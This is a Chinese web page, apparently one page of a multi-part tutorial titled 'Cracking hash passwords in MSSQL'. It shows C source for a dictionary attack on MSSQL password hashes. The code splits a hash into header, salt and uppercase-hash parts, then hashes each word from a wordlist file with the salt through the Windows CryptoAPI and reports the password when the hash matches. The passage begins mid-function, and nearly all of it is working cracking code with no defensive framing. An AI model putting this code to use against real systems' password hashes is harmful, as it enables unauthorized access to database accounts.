首页/杀毒教程/内容

破解MSSQL中的HASH密码

杀毒教程2024-01-30 阅读()
[摘要]hash[1] == 'X')) { hash = hash + 2; strncpy(pheader,hash,4); printf("\nHeader\t\t:...
hash[1] == 'X'))

{

hash = hash + 2;

strncpy(pheader,hash,4);

printf("\nHeader\t\t: %s",pheader);

if(strlen(pheader)!=4)

return printf("%s",lerr);

hash = hash + 4;

strncpy(pkey,hash,8);

printf("\nRand key\t: %s",pkey);

if(strlen(pkey)!=8)

return printf("%s",lerr);

hash = hash + 8;

strncpy(pnorm,hash,40);

printf("\nNormal\t\t: %s",pnorm);

if(strlen(pnorm)!=40)

return printf("%s",lerr);

hash = hash + 40;

strncpy(pucase,hash,40);

printf("\nUpper Case\t: %s",pucase);

if(strlen(pucase)!=40)

return printf("%s",lerr);

strncpy(pucfirst,pucase,2);

sscanf(pucfirst,"%x",&cmp);

}

else

{

return printf("The password hash has an invalid format!\n");

}

printf("\n\n Trying...\n");

if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))

{

if(GetLastError()==NTE_BAD_KEYSET)

{

// KeySet does not exist. So create a new keyset

if(!CryptAcquireContext(&hProv,

NULL,

NULL,

PROV_RSA_FULL,

CRYPT_NEWKEYSET ))

{

printf("FAILLLLLLL!!!");

return FALSE;

}

}

}

while(1)

{

// get a word to try from the file

ZeroMemory(wttf,44);

if(!fgets(wttf,40,fd))

return printf("\nEnd of password file. Didn't find the password.\n");

wd++;

len = strlen(wttf);

wttf[len-1]=0x00;

ZeroMemory(uwttf,84);

// Convert the word to UNICODE

while(count < len)

{

uwttf[cnt]=wttf[count];

cnt++;

uwttf[cnt]=0x00;

count++;

cnt++;

}

len --;

wp = &uwttf;

sscanf(pkey,"%x",&key);

cnt = cnt - 2;

// Append the random stuff to the end of

// the uppercase unicode password

t = key >> 24;

x = (unsigned char) t;

uwttf[cnt]=x;

cnt++;

t = key << 8;

t = t >> 24;

x = (unsigned char) t;

uwttf[cnt]=x;

cnt++;

t = key << 16;

t = t >> 24;

x = (unsigned char) t;

uwttf[cnt]=x;

cnt++;

t = key << 24;

t = t >> 24;

x = (unsigned char) t;

uwttf[cnt]=x;

cnt++;

// Create the hash

if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))

{

printf("Error %x during CryptCreatHash!\n", GetLastError());

return 0;

}

if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))

{

printf("Error %x during CryptHashData!\n", GetLastError());

return FALSE;

}

CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);

// Test the first byte only. Much quicker.

if(szhash[0] == cmp)

{

// If first byte matches try the rest

ptr = pucase;

cnt = 1;

while(cnt < 20)

{

ptr = ptr + 2;

strncpy(pucfirst,ptr,2);

sscanf(pucfirst,"%x",&cmp);

if(szhash[cnt]==cmp)

cnt ++;

else

{

break;

}

}

if(cnt == 20)

{

// We've found the password

printf("\nA MATCH!!! Password is %s\n",wttf);

return 0;

}

}

count = 0;

cnt=0;

}

return 0;

}





第1页  第2页  第3页 

……

标签:破解MSSQL中的HASH密码
相关阅读